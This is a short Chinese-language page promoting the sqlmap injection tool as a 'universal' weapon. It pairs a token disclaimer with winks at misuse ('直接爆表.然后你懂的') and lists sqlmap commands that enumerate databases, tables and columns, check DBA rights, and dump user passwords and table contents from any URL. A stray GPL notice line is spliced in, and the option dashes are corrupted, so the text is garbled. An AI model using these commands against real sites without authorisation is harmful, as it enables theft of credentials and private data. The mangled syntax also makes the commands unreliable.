万能注入神器sqlmap

本软件下载地址未录入，如想要软件请评论，我们会补上！

注入神器sqlmap,懂的收了,是万能的注入安全监测工具，不能用来干坏事哦，后果自负

配合上burpsuit，天下无敌鸟~;;;;~;;;;

Describes the terms under which sqlmap is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.

mssql access 直接爆表.然后你懂的
BT5里面的话前面就要加python
sqlmap.py ­u url ­­dbs //爆数据库
sqlmap.py ­u url ­­current­db //爆当前库
sqlmap.py ­u url ­­current­user //爆当前用户
sqlmap.py ­u url ­­users   查看用户权限
sqlmap.py ­u url ­­tables ­D 数据库 //爆表段
sqlmap.py ­u url ­­columns ­T 表段 ­D 数据库 //爆字>

段
sqlmap.py ­u url ­­dump ­C 字段 ­T 表段 ­D 数据库 //猜解
sqlmap.py ­u url ­­dump ­­start=1 ­­stop=3 ­C 字段 ­T 表段 ­D 数据库 //猜解1到3的字段

翻回来也可以

sqlmap.py ­u url  判断
sqlmap.py ­u url ­­is­dba ­v   这是判断当前数据库的使用者是否是dba
sqlmap.py ­u url ­­users ­v 0  这句的目的是列举数据库的用户
sqlmap.py ­u url ­­passwords ­v 0 这句的目的是获取数据库用户的密码
sqlmap.py ­u url ­­privileges ­v 0 这是判断当前的权限
sqlmap.py ­u url ­­dbs ­v 0 这句的目的是将所有的数据库列出来
sqlmap.py ­u url ­­tables ­D `表` 爆表
sqlmap.py ­u url ­­columns ­T ‘表’­D ‘数据库’爆列
sqlmap.py ­u url ­­dump ­T `表` ­­start 1 ­­stop 4 ­v 0 这里是查询第2到第4行的内
sqlmap.py ­u url ­­dump ­all ­v 0

 

>